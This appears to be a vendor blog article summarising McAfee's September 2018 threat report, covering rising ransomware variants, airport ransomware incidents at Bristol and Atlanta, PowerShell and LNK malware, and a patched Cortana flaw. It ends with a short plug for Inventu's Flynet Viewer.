While cybercriminals across the globe continue to design new threats to paralyze networks and allow the harvesting of sensitive data, a tried-and-true method remains as prolific as ever: ransomware. While the emergence of new ransomware strains has slowed, according to the latest data from McAfee Labs, ransomware attacks are still being fueled apace, and the total number of ransomware samples is growing, leading to concerns from enterprise players and major cities that a serious attack could be in the offing.
Ransomware variants increasing
McAfee Labs Threat Report for September 2018 showed that the number of ransomware samples increased 57 percent over the last four quarters, and McAfee also saw existing ransomware families spawn new variants. Ransomware is often referred to as existing in families, with a new family appearing periodically and "spawning" variants that are similar to the rest of the family but built to exploit vulnerabilities in new ways and get around patches against past family members.
For example, a dozen new variants of the Scarab ransomware family were spawned just in the second quarter of this year. They account for more than half of the total number of Scarab variants identified since mid-2017, when the Scarab ransomware family appeared. Last year, several outbreaks of serious ransomware attacks occurred. The WannaCry and NotPetya ransomware attacks swept across the globe, wreaking havoc.
These were new malware samples which had been specifically designed to exploit software vulnerabilities, and McAfee noted that the exploits from these two high-profile threats were repeatedly repurposed within new malware strains. Subsequently, newly discovered vulnerability exploits were similarly adapted to produce new threats, and cybercriminals were provided with compelling examples of just how quickly these types of malware could use vulnerability exploits to first gain a foothold on systems, then easily propagate across networks in a prolific manner.
The ability of families to spawn new variants means that even vulnerabilities seemingly fixed as far back as 2014 can still be subject to new exploits. McAfee Advanced Threat Research Lead Scientist and Senior Principal Engineer Christiaan Beek stated, "It's still surprising to see numerous vulnerabilities from as far back as 2014 used successfully to spearhead attacks, even when there have been patches available for months and years to deflect exploits. This is a discouraging testament to the fact that users and organizations still must do a better job of patching vulnerabilities when fixes become available."
Airports fight back against ransomware attacks
In mid-September, flight information screens were blacked out over a weekend at the Bristol Airport in the UK. According to ZDNet, "Airport officials blamed the incident on a ransomware infection that affected the computers running the airport's in-house TV screens displaying arrival and departure flight information." Airport officials refused to pay the attacker's ransom demand and opted to take down their systems while they serviced affected computers. From the initial infection Friday morning through Saturday night, airport officials warned passengers to arrive early, and used paper posters and whiteboards to announce check-in and arrival information for flights going through the airport. No flights were delayed, and functionality to affected systems was restored on Sunday morning.
In March 2018 Hartsfield-Jackson Atlanta International Airport shut off Wi-Fi service as a security precaution during an active ransomware attack on the city. Multiple city official computers had their files encrypted and held at ransom by an attack known as SamSam. According to Secplicity, "The airport had "pulled the plug" on their Wi-Fi service likely to avoid the attack spreading to airport authority computers, airline computers, and possibly customers' computers." The malware launcher reportedly asked for a ransom of $50,000 in Bitcoin, but it is unknown if the city tried to pay – the portal for the ransom payment was taken offline and the city spent $2.6 million to recover from the attack on the city.
Microsoft has Powershell, Cortana issues
Microsoft's task automation and configuration management framework PowerShell was a main target for fileless malware developers, and new LNK malware continues to grow, thanks to cybercriminals utilizing .lnk shortcuts to deliver malicious PowerShell scripts and other malware. A 489 percent over the past four quarters was reported for malicious samples in this category. Microsoft also was informed by McAfee Labs in April about a severe vulnerability in the Cortana voice assistant in the latest Microsoft Windows installation (Windows 10). Microsoft released a patch for the flaw in June, recognizing it had provided an exploitable opportunity for "attackers to execute code from the locked screen of a fully patched Windows 10 machine."
Agile IT modernization can help businesses of all sizes adapt to the data security demands that accompany the advent of ransomware attacks. Inventu's Flynet Viewer meets the needs of organizations and their employees in a way that feels both familiar and simple.